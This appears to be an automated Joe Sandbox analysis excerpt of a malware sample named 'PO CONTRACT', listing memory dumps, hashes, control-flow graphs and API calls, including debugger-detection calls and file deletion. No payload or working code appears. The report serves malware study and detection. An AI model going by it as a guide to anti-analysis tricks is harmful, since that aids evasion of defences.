                                          • Instruction ID: 1fa7b1fd897eb3009e06997021972609b0addfdef22567c24becdfd808182be5
                                          • Opcode Fuzzy Hash: f63283c26da3c5284f596aa32cd24abb1cfa00e0d1e6169b37c40a1f359e0007
                                          • Instruction Fuzzy Hash: 8B727370A002198FDB24DFA9D848AAEBBF2FF89704F148559E845EB3A5DB34DC45CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bc712e23d40772859c9e2dc7ed3112e37649438a4503b6aa5db2c64e59f469b
                                          • Instruction ID: 16d86aa878dd30f74e1fa58390d99bf44f04ae7dbcfa623ffa2d782254603144
                                          • Opcode Fuzzy Hash: 9bc712e23d40772859c9e2dc7ed3112e37649438a4503b6aa5db2c64e59f469b
                                          • Instruction Fuzzy Hash: FA818135F102299BCF1CAB79945467E7BA7BFC8700B15852DE452E7389CE359C018BA2

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 5948 545f3d0-545f40c 5949 545f412-545f417 5948->5949 5950 545f4bc-545f4dc 5948->5950 5951 545f419-545f450 5949->5951 5952 545f46a-545f4a2 CallWindowProcW 5949->5952 5957 545f4df-545f4ec 5950->5957 5959 545f452-545f458 5951->5959 5960 545f459-545f468 5951->5960 5953 545f4a4-545f4aa 5952->5953 5954 545f4ab-545f4ba 5952->5954 5953->5954 5954->5957 5959->5960 5960->5957
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0545F491
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: 41320796da0c8b10a9acf09f9783ba6375a56e9a628b1f6e22ccd3f99a47e2ba
                                          • Instruction ID: 3cab864ffa73dba59fa49c1f95ae8a69ebcb3095b0562e2c508ea22aa0afff52
                                          • Opcode Fuzzy Hash: 41320796da0c8b10a9acf09f9783ba6375a56e9a628b1f6e22ccd3f99a47e2ba
                                          • Instruction Fuzzy Hash: 0F414CB4900309DFCB14CF99C488AAABBF5FF89324F24C499D519A7322D774A845DFA1

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 5962 972869f-97286aa 5963 97286f2-97286f6 5962->5963 5964 97286ac-97286bd 5962->5964 5965 97286f7-9728722 5963->5965 5966 97286bf-97286f0 5963->5966 5964->5966 5968 9728724-9728727 5965->5968 5969 972872a-9728755 DeleteFileW 5965->5969 5966->5963 5968->5969 5970 9728757-972875d 5969->5970 5971 972875e-9728786 5969->5971 5970->5971
                                          APIs
                                          • DeleteFileW.KERNELBASE(00000000), ref: 09728748
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 47d0312696cc933282d7e4f5ecf8eef74e3aae33c801403dc36caac9da2be1b0
                                          • Instruction ID: d3fbf61755e7a57a648fdb005ef01e2aef0285f6ba0e8b3012ff27f658060080
                                          • Opcode Fuzzy Hash: 47d0312696cc933282d7e4f5ecf8eef74e3aae33c801403dc36caac9da2be1b0
                                          • Instruction Fuzzy Hash: 053180B2C097958FCB02CFA5C8547D9BFB0AF46310F1A819BD494EB392D3385905CBA2

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 5974 545304a-54530f4 CheckRemoteDebuggerPresent 5976 54530f6-54530fc 5974->5976 5977 54530fd-5453138 5974->5977 5976->5977
                                          APIs
                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 054530E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: CheckDebuggerPresentRemote
                                          • String ID:
                                          • API String ID: 3662101638-0
                                          • Opcode ID: ffcb7112a893b4b110f12250bbc5e6f08901b69fcafa64e67f76e35f81164153
                                          • Instruction ID: c7e3a5866bac5eb3453fe51e3d3dab82a6aa2fc2d4b3fc8f40510cf8345c0b85
                                          • Opcode Fuzzy Hash: ffcb7112a893b4b110f12250bbc5e6f08901b69fcafa64e67f76e35f81164153
                                          • Instruction Fuzzy Hash: E93189718042598FCB10CFAAC884BEEBBF4AF49220F14845AE445B7351C7389945CF61

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 5986 97286d8-9728722 5988 9728724-9728727 5986->5988 5989 972872a-9728755 DeleteFileW 5986->5989 5988->5989 5990 9728757-972875d 5989->5990 5991 972875e-9728786 5989->5991 5990->5991
                                          APIs
                                          • DeleteFileW.KERNELBASE(00000000), ref: 09728748
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 4f77eb0a24f099fcd4ae737f4047675bcccf89bf3693bb74c27c3489aaa80b43
                                          • Instruction ID: 744314156a2155788656ac5239876ba6c8e70a3e12c495f99d8340051311417d
                                          • Opcode Fuzzy Hash: 4f77eb0a24f099fcd4ae737f4047675bcccf89bf3693bb74c27c3489aaa80b43
                                          • Instruction Fuzzy Hash: F71113B6C006199BCB14CF9AC444BDEFBF4EB48320F14852AD818B7740D338A954CFA5

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 5994 54531f0-5453242 5997 5453244-5453247 5994->5997 5998 545324a-5453275 OutputDebugStringW 5994->5998 5997->5998 5999 5453277-545327d 5998->5999 6000 545327e-5453292 5998->6000 5999->6000
                                          APIs
                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 05453268
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DebugOutputString
                                          • String ID:
                                          • API String ID: 1166629820-0
                                          • Opcode ID: 1a4df901d894eb9bd0d554f486ca87e62e8e65d2b82c6ac3e6c3bb7a4406136b
                                          • Instruction ID: bfab3f30ae1b246cc53871ec4c26377a9801dd744cf1d78fa66dae8aa676c02c
                                          • Opcode Fuzzy Hash: 1a4df901d894eb9bd0d554f486ca87e62e8e65d2b82c6ac3e6c3bb7a4406136b
                                          • Instruction Fuzzy Hash: 921122B5C006099BCB14CF9AD844ADEFBF4FB48324F20851AE818B3640C734A944CFA1

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 6002 54531f8-5453242 6004 5453244-5453247 6002->6004 6005 545324a-5453275 OutputDebugStringW 6002->6005 6004->6005 6006 5453277-545327d 6005->6006 6007 545327e-5453292 6005->6007 6006->6007
                                          APIs
                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 05453268
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DebugOutputString
                                          • String ID:
                                          • API String ID: 1166629820-0
                                          • Opcode ID: b6c5f03f779e08ff9553ff15d471499b7c8823d61734adbfb0dcf14965d8b140
                                          • Instruction ID: 04c4b65eda79fb95b73f18e5c58e885d620fa07bcb58822188089083eff36486
                                          • Opcode Fuzzy Hash: b6c5f03f779e08ff9553ff15d471499b7c8823d61734adbfb0dcf14965d8b140
                                          • Instruction Fuzzy Hash: 551120B5C006099BCB18CF9AD884ADEFBF8FB48320F10851AE818B3740C734A944CFA5

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 6009 8ff8036-8ff80a2 PostMessageW 6011 8ff80ab-8ff80bf 6009->6011 6012 8ff80a4-8ff80aa 6009->6012 6012->6011
                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 08FF8095
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 3ed73c9fb6b2af525090948630741e836ed6cdd3c39af486f7b235d6ec55b8e1
                                          • Instruction ID: 801d0ad896b1d26e3d6976d20bbf304bbd4f8bac4fb0620af408cf2ba2c04105
                                          • Opcode Fuzzy Hash: 3ed73c9fb6b2af525090948630741e836ed6cdd3c39af486f7b235d6ec55b8e1
                                          • Instruction Fuzzy Hash: EF11F2B58002489FCB20CF9AC884BDEBBF8EB48314F20841AE518A3611C375A944CFA1

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 6014 8ff8038-8ff80a2 PostMessageW 6015 8ff80ab-8ff80bf 6014->6015 6016 8ff80a4-8ff80aa 6014->6016 6016->6015
                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 08FF8095
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 2f51adedfd0f0f94d7b8767e677833d00d7eaff23a0a406974728bf5bf0bb625
                                          • Instruction ID: f49f0805e27f9ae09da8953021caf1c9dc6bf42daa5db9a9814beb5987747733
                                          • Opcode Fuzzy Hash: 2f51adedfd0f0f94d7b8767e677833d00d7eaff23a0a406974728bf5bf0bb625
                                          • Instruction Fuzzy Hash: 9411D3B58002499FDB20CF9AC884BDEFBF8FB48314F20845AE558A7711C375A954CFA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 136ccc5e94e35b7539c34a6800989ed7ccc9a68bd28951fdb5235eaad96f335a
                                          • Instruction ID: f55cefa4f49394b80cd3a23f0f9d6685168c6001676f2b9cbf2272cb9a2dbb43
                                          • Opcode Fuzzy Hash: 136ccc5e94e35b7539c34a6800989ed7ccc9a68bd28951fdb5235eaad96f335a
                                          • Instruction Fuzzy Hash: B9724874A14615CFCB14DFB4E889AAEB7B2FF88304F518A29D90A97754CB34BC41CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc80f19a5f0ab91190d4c977442cbabdf1098d7e8200418de8e6ef874050b664
                                          • Instruction ID: 33c5909a421c5a88a3336670a4418b916bf375b0d44f0751464f132b1a2b988b
                                          • Opcode Fuzzy Hash: cc80f19a5f0ab91190d4c977442cbabdf1098d7e8200418de8e6ef874050b664
                                          • Instruction Fuzzy Hash: E212D430A08305CFC705BBB8E89926E7FF2EF85200F4649AED585D7292DE385859C7D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 37087ecf095da61094644a7f1fe978d3af76c9e3f15a1ec008dcb08751d636cb
                                          • Instruction ID: d3fea04b2a30a3c403acfbf0d28c793abfd8d1d2ddbb6dcf6f01aa4ecfaa6a39
                                          • Opcode Fuzzy Hash: 37087ecf095da61094644a7f1fe978d3af76c9e3f15a1ec008dcb08751d636cb
                                          • Instruction Fuzzy Hash: E7E16D70A16218CFC708FBB9E98966D7BF1EB48200F5149B9E449E7350EE349C59C7A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e60cbb5f7d125766dedd5acb74d52462ae5deac0e9a50f1cc409a32e230a915
                                          • Instruction ID: 305f10311a1a510404dd6c3f78c222f1e53829a94e8b5fb4394b744617ae04c4
                                          • Opcode Fuzzy Hash: 4e60cbb5f7d125766dedd5acb74d52462ae5deac0e9a50f1cc409a32e230a915
                                          • Instruction Fuzzy Hash: A4223F34A00219CFEB649BB4C858B7DB7B2FB84349F1084A9D44AAB395DB35DD85CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbf60a2b57b282669dbfbc033efa8e51a85df102af95fffee2eecad50ebd40e8
                                          • Instruction ID: 07eab6cb9d9e45511fe20a6fce335f37f4501b248e7e9a05b33063c630a6b6ef
                                          • Opcode Fuzzy Hash: cbf60a2b57b282669dbfbc033efa8e51a85df102af95fffee2eecad50ebd40e8
                                          • Instruction Fuzzy Hash: 8D02BE70A18315CFCB09BBB8E89926E7BF2FF49200F4149A9D485E7391DB389C19C791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 252d37ca549856926f7884f810ae600b295cd38000afa17e19ecc5c158bddb59
                                          • Instruction ID: db6dc823aeca9fea79aed720ec5ee6f08f3b89543ff8bb14f3e457d575261cbb
                                          • Opcode Fuzzy Hash: 252d37ca549856926f7884f810ae600b295cd38000afa17e19ecc5c158bddb59
                                          • Instruction Fuzzy Hash: C4F16B70A24229CBCB48BBF9E88966E7BF2FF88200F414969D445E7354DF389C55C791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2bc839f0913a1521fafa2f660bcc29db96562f87aab2ce02e9537bd770ec6f8
                                          • Instruction ID: ac7e954c9e59488df307cfa7b2ef5f2ba7d223ad14f8a378f7a2a394d3082a31
                                          • Opcode Fuzzy Hash: d2bc839f0913a1521fafa2f660bcc29db96562f87aab2ce02e9537bd770ec6f8
                                          • Instruction Fuzzy Hash: E6418170B14219CBC748BBF9E88966EBBB6FB84300F414968D645E3340DF785859C7E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7771c292d8267b48160b03af4091d053f6c6a86ba08cd7d97d4e3a0542e7bf46
                                          • Instruction ID: 7fe99f54bb82f2f494e9ccec7c2c023ea6f89e62bf7a633bf4d44eb35fb1830e
                                          • Opcode Fuzzy Hash: 7771c292d8267b48160b03af4091d053f6c6a86ba08cd7d97d4e3a0542e7bf46
                                          • Instruction Fuzzy Hash: 195158B4E00348DFDB18CFA9D844A9DBFF1BF09314F14815EE915AB291D7B49845CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a27e89d79f7031c57c2348ae69c3bff290880ab2be069e9e01d55b6940adda68
                                          • Instruction ID: eec7cde08a9528b9ea7b24bf56cf0d1d3cb3f1b9ab85f12a6e17cc9869d131c0
                                          • Opcode Fuzzy Hash: a27e89d79f7031c57c2348ae69c3bff290880ab2be069e9e01d55b6940adda68
                                          • Instruction Fuzzy Hash: 3D41B03060D3819FC306BBB598655197FF1EF82210F4589DFD4D9CB292DB389819C7A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c64ae42643cc2511bebb0e52a8c4745bef8a96a01cc65b4fb2ef72d50db1dea
                                          • Instruction ID: 739b5db4f1049b091e91858b88a1a64711ba20c06e698f0427ce91a5ac3b7109
                                          • Opcode Fuzzy Hash: 4c64ae42643cc2511bebb0e52a8c4745bef8a96a01cc65b4fb2ef72d50db1dea
                                          • Instruction Fuzzy Hash: D7419D317042049FCB289B69E858AAE7BF6BFC8710F248469E506DB395CF359C45CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 522a481cbe987197c2a3bedccacd79926fbc803e712ce3caba16eb582d29b5c8
                                          • Instruction ID: a32dae666ec06851b07992cbbcd2e2cff9ed98bfe98816085d110532f750328d
                                          • Opcode Fuzzy Hash: 522a481cbe987197c2a3bedccacd79926fbc803e712ce3caba16eb582d29b5c8
                                          • Instruction Fuzzy Hash: D9D0C5391681048FC3982BA5FA0F0983FA9AA446167440221F84E80930DF74A8548A56
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d2a3c9b3347f51b51aa6e95f651fd19ce4c07dd6f094f3d7065c81bb6179997
                                          • Instruction ID: f41bc1159c7228c61880b90cdc673faa554b128dc5c8262afefaabe73f471988
                                          • Opcode Fuzzy Hash: 2d2a3c9b3347f51b51aa6e95f651fd19ce4c07dd6f094f3d7065c81bb6179997
                                          • Instruction Fuzzy Hash: D64167746042198FCB15DF68E888BBA7BB1BF89314F114069E946CB3B1C731DC95CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c69608f516716c3185f41ab840ded9c78d3772886929d08048d31caa28bceac5
                                          • Instruction ID: 72f1b12c39bf471a54b47be351cbf01c4c87cc384d23d1e932ca7b17014a410e
                                          • Opcode Fuzzy Hash: c69608f516716c3185f41ab840ded9c78d3772886929d08048d31caa28bceac5
                                          • Instruction Fuzzy Hash: 5141D1313002159FCB299F69E858A7E7BE6EB89319F04806AF905DB3A1CB35DC11CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b56390db223a17e4cbd87092f805cf250de905832426482f21c4c5e80d504b36
                                          • Instruction ID: 73f0f712854f942210a8fd136a5b935143a694fa76216b20e9946482daf130b8
                                          • Opcode Fuzzy Hash: b56390db223a17e4cbd87092f805cf250de905832426482f21c4c5e80d504b36
                                          • Instruction Fuzzy Hash: C44122B4E10208DFDB18CFA9D884B9EBBF1BF48315F14C029E919AB250D7B4A841CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 964023e45d29f9043487d047ab704effadb0e6b63719755731a492ae2855c3f6
                                          • Instruction ID: 8ec42e93388e1d6568d59ec95f74437ac95580871fcfb79d912baaf1ebf5b268
                                          • Opcode Fuzzy Hash: 964023e45d29f9043487d047ab704effadb0e6b63719755731a492ae2855c3f6
                                          • Instruction Fuzzy Hash: F231A361A1D3858FC706BBB8AC5855A7FB4DF46110F0546EFD5C4DB2D3DA684818C3A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b49f08350b34dd0c686f5b0c155f8b180170caebd246393df709bdbda669bf54
                                          • Instruction ID: fd05007699667067d75172a530daef624b4b725614ce660c344adce4c14280df
                                          • Opcode Fuzzy Hash: b49f08350b34dd0c686f5b0c155f8b180170caebd246393df709bdbda669bf54
                                          • Instruction Fuzzy Hash: DF317430F04118CBDB149B6DD46C7BEB6A3BB88705F644429E882F7394CAB5DC49DBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52cf042520ece024b7eeda76a0b8217dbf147796d77c12baf84d324bd87b59a9
                                          • Instruction ID: 7baef62a8d3ddfd749c1ebb6c00d2b2d9304272a944f69d31ec4dc4984148c6c
                                          • Opcode Fuzzy Hash: 52cf042520ece024b7eeda76a0b8217dbf147796d77c12baf84d324bd87b59a9
                                          • Instruction Fuzzy Hash: EC31727570420AAFCF159F69E4586BE3BE2FB88319F108029F9198B3A4CB35DC51DB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34c0da47662863b73115287c40ddaeb4a1ff1cf1b843c05a604ef496aeeda734
                                          • Instruction ID: cdccbd71ca208b15a2c357050136f593527fd4f8b54b17a425deb1bf9dcc1ca0
                                          • Opcode Fuzzy Hash: 34c0da47662863b73115287c40ddaeb4a1ff1cf1b843c05a604ef496aeeda734
                                          • Instruction Fuzzy Hash: 05318430A14214CBDB145B69D45C7FEB7B3BB88704F28442AE882E7390CBB59D49DB61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab4f92a03963b80c060fc6e408150fe2e397e43938c2de0129c9a2d98d3a55d7
                                          • Instruction ID: e32699acd06f7d08d70071d0e056147efdda7511ba00f3c6de82c420a9261d89
                                          • Opcode Fuzzy Hash: ab4f92a03963b80c060fc6e408150fe2e397e43938c2de0129c9a2d98d3a55d7
                                          • Instruction Fuzzy Hash: 3221B1303082014FDF295725A49837D76A7EFC5318FA84079E446CB3DADB29CC82D340
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 890623a049dbc52fd166d7841fce78117b1734d32b8688010d8b52ddcfd508a7
                                          • Instruction ID: a2f4ceed04691eb0961b3ac9aeb77e5df4a76395d598a98f650eedb757e08ce5
                                          • Opcode Fuzzy Hash: 890623a049dbc52fd166d7841fce78117b1734d32b8688010d8b52ddcfd508a7
                                          • Instruction Fuzzy Hash: 2821F7317041558FCB14CEA6F88C67F7BEAAB85210F944526E852CB396DB74CC91CB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cb7ca1a6a31bfacc2f839e2672e3037bb7471d2a21f2603bd119b669f7eadb2
                                          • Instruction ID: 8e2e840de2a1b34000fc9217983f668760f053e7a9827da78c001e0af3b2c7c4
                                          • Opcode Fuzzy Hash: 5cb7ca1a6a31bfacc2f839e2672e3037bb7471d2a21f2603bd119b669f7eadb2
                                          • Instruction Fuzzy Hash: 9A316B3120020AAFCF059F59E85CABE3BA2FB48200F04802AF9958B364CB35CD61DB95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68ba61420587f943a52cf9568941972ae23aeb9d0259cd28b45aead184221a51
                                          • Instruction ID: 3830eb3ee69d93f3cd358436794f4914c772c73270c11681b88643a71cf7f821
                                          • Opcode Fuzzy Hash: 68ba61420587f943a52cf9568941972ae23aeb9d0259cd28b45aead184221a51
                                          • Instruction Fuzzy Hash: C621D775B182258BC744BBF4EC8972E7BF5EF88610F4589AAD489D7381DE389C09C391
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
